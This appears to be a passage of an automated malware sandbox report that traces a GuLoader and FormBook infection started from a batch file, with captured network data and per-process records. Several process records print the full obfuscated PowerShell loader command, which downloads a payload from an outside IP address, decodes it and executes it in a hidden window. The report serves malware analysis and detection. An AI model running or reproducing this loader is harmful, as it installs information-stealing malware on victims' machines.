64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73
                                          Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.des
                                          Apr 24, 2024 11:58:55.456300974 CEST407INData Raw: 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a
                                          Data Ascii: c {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-siz
                                          Apr 24, 2024 11:58:55.754383087 CEST1289INData Raw: 37 66 66 61 0d 0a 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41 45 44 43 41 59 41 41 41 43
                                          Data Ascii: 7ffa<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJQFURFRQEb
                                          Apr 24, 2024 11:58:55.754415989 CEST1289INData Raw: 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35 63 32 49 45 59 30 2b 53 56
                                          Data Ascii: /Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/uuXvz1PLOr
                                          Apr 24, 2024 11:58:55.754448891 CEST1289INData Raw: 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37 37 36 48 78 69 6b 34 44 69
                                          Data Ascii: OEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8otMbABahkH
                                          Apr 24, 2024 11:58:55.754467010 CEST1289INData Raw: 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58 79 38 74 41 37 50 72 73 4c
                                          Data Ascii: 0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP7aB/DgAjw
                                          Apr 24, 2024 11:58:55.754492044 CEST1289INData Raw: 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52 44 66 5a 6a 50 69 2f 6e 50
                                          Data Ascii: Dip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2//iUPDsc41
                                          Apr 24, 2024 11:58:55.754509926 CEST1289INData Raw: 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78 47 59 39 70 32 42 4e 46 66
                                          Data Ascii: rS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+PrFkk8CAAqj
                                          Apr 24, 2024 11:58:55.754528046 CEST1289INData Raw: 4f 4f 36 4e 64 41 4a 41 59 36 37 54 75 6a 47 45 59 5a 75 37 36 43 4f 7a 42 4c 69 4f 56 52 6f 50 4b 39 53 76 34 65 76 30 35 64 65 47 49 4d 70 75 58 62 37 6b 64 2f 6c 36 64 59 48 2f 39 39 36 71 53 65 2f 2f 64 47 47 4c 31 46 51 31 47 2f 58 51 41 73
                                          Data Ascii: OO6NdAJAY67TujGEYZu76COzBLiOVRoPK9Sv4ev05deGIMpuXb7kd/l6dYH/996qSe//dGGL1FQ1G/XQAsZAVQexW+mEAVDy3t7SPrsXIgYvn08gFy+Cr+x5cgaIbHI3AFcseaGgr5IroALCQLY6zWbrOFsVyWDz4WMhPdADwP3X/2i833l9+IDE7bVB+OwZAxfHtG5WucnT+yR3tDide6x2g0fUnIru6Qw/ahrxlbTQY9V8ajH
                                          Apr 24, 2024 11:58:55.754544020 CEST1289INData Raw: 59 2b 50 68 74 30 41 55 59 4c 36 54 56 71 57 45 6c 2b 59 49 43 4b 6d 48 37 36 55 6b 77 45 2b 72 4a 4a 7a 68 42 6f 42 2f 54 4d 43 75 77 61 69 76 61 6a 44 71 76 77 65 77 46 6e 4b 67 70 32 49 45 6e 74 76 59 73 6b 4b 70 6b 41 2f 37 7a 56 73 62 76 4f
                                          Data Ascii: Y+Pht0AUYL6TVqWEl+YICKmH76UkwE+rJJzhBoB/TMCuwaivajDqvwewFnKgp2IEntvYskKpkA/7zVsbvOXYz9BpFoGoVBHmV1CZex6bct8Bj4kFzkWzRXHFfk1cJeD3HfJpkBOAHIt58sYLS9871j/2BQZ2uagLeeKa1wkqe2rGse0fj10/84MAta4bOR6/0hFExry0HyWaUG6lS83hIoAD9uwsovjcuaFjfGCxxICAvAV4skp
                                          Apr 24, 2024 11:58:55.755204916 CEST1289INData Raw: 55 4f 32 31 57 79 7a 58 4e 57 66 48 53 4f 71 34 36 76 53 37 47 6d 34 72 4d 50 43 73 66 31 6d 52 76 69 71 4e 43 30 34 49 73 56 50 79 44 7a 71 51 56 61 47 2b 4e 52 67 31 50 38 64 46 58 67 33 32 54 4d 51 4a 61 6e 69 48 79 6c 72 57 69 45 70 39 54 64
                                          Data Ascii: UO21WyzXNWfHSOq46vS7Gm4rMPCsf1mRviqNC04IsVPyDzqQVaG+NRg1P8dFXg32TMQJaniHylrWiEp9TdvP68UjoPu6RJ+ExHefACInrNzeQ6A9a7p6hMAw0YoKJKah4kBBySJyQvMtao0BKAk/m8Tm777sQfuGoz6QZDz/hxKKiaiiyW8dO3Gt5nZi0YMHAl/773guFD7VwIgfMM+jZ1CH4R+BTlBujC2AyhyDdtRXF01ZwuK


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:4
                                          Start time:11:56:51
                                          Start date:24/04/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_La-Tanerie04180240124.bat" "
                                          Imagebase:0x7ff718630000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:11:56:51
                                          Start date:24/04/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff64b640000
                                          File size:875'008 bytes
                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:11:56:51
                                          Start date:24/04/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"
                                          Imagebase:0x7ff6ffd90000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.20453370877.0000025A329E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:11:56:51
                                          Start date:24/04/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff64b640000
                                          File size:875'008 bytes
                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:11:56:51
                                          Start date:24/04/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $"
                                          Imagebase:0x7ff718630000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:10
                                          Start time:11:56:58
                                          Start date:24/04/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"
                                          Imagebase:0x880000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.20097330358.00000000090A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.20097370457.000000000AFA5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:11
                                          Start time:11:56:59
                                          Start date:24/04/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $"
                                          Imagebase:0xbe0000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:12
                                          Start time:11:57:12
                                          Start date:24/04/2024
                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                          Imagebase:0x930000
                                          File size:516'608 bytes
                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:14
                                          Start time:11:57:38
                                          Start date:24/04/2024
                                          Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                          Imagebase:0x140000000
                                          File size:16'696'840 bytes
                                          MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:15
                                          Start time:11:57:38
                                          Start date:24/04/2024
                                          Path:C:\Windows\SysWOW64\AtBroker.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\AtBroker.exe"
                                          Imagebase:0x6c0000
                                          File size:68'608 bytes
                                          MD5 hash:D5B61959A509BDA85300781F5A829610
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:false

                                          Target ID:16
                                          Start time:11:57:51
                                          Start date:24/04/2024
                                          Path:C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe"
                                          Imagebase:0x170000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          Target ID:17
                                          Start time:11:57:57
                                          Start date:24/04/2024
                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                          Imagebase:0x930000
                                          File size:516'608 bytes
                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:18
                                          Start time:11:57:57
                                          Start date:24/04/2024
                                          Path:C:\Windows\System32\rundll32.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                          Imagebase:0x7ff618a70000
                                          File size:71'680 bytes
                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:20
                                          Start time:11:58:05
                                          Start date:24/04/2024
                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                          Imagebase:0x7ff6f2b50000
                                          File size:597'432 bytes
                                          MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:21
                                          Start time:11:58:05
                                          Start date:24/04/2024
                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
